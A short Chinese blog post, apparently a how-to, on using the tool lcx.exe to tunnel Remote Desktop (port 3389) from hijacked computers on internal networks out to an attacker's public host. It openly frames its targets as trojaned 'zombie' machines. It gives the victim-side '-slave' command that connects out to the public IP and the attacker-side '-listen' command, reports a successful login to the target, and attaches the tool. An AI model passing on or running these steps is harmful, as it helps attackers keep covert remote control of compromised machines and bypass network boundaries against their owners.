端口轉發(Port forwarding),有時被叫做隧道,是安全殼(SSH) 為網絡安全通信使用的一種方法。端口轉發是轉發一個網絡端口從一個網絡節點到另一個網絡節點的行為,其使一個外部用戶從外部經過一個被激活的NAT路由器到達一個在私有內部IP地址(局域網內部)上的一個端口。
這里我就用工具是Lcx,Lcx.exe是一個端口轉發工具,相當于把肉雞A上的3389端口轉發到具有外網IP地址的B機上,這樣連接B機的3389端口就相當于鏈接A機的3389端口。Lcx程序多用于被控制計算機(肉雞)處于內網的情況,被控制機可能中了木馬程序,雖然能夠進行控制,但還是沒有使用遠程終端登陸到本機進行管理方便,因此在很多情況下,都會想方設法在被控制計算機上開啟3389端口,然后通過lcx等程序進行端口轉發,進而在本地連接到被控制計算機的遠程終端并進行管理和使用。
先開啟 Windows xp 查看內網IP信息
在目標機器上執行lcx.exe -slave 公網ip 端口 內網ip 端口
例如:lcx.exe –slave 154.223.*.* 51 192.168.*.* 3389 將內網的3389端口轉發到公網的51端口
然后在公網的機器上:Lcx.exe –listen 監聽51端口,轉發到公網機器的3389端口
例如:Lcx.exe –listen 51 3389
這個時候已經將內網的3389轉發到了公網機器的3389端口,我們在本地機器上遠程公網IP 3389 ,就連接上了內網機器的3389,此時已經成功登陸進來,我們查看IP,可以看到是目標機器。
附件:lcx.rar
該文章在 2021/6/9 14:58:31 編輯過
400 186 1886
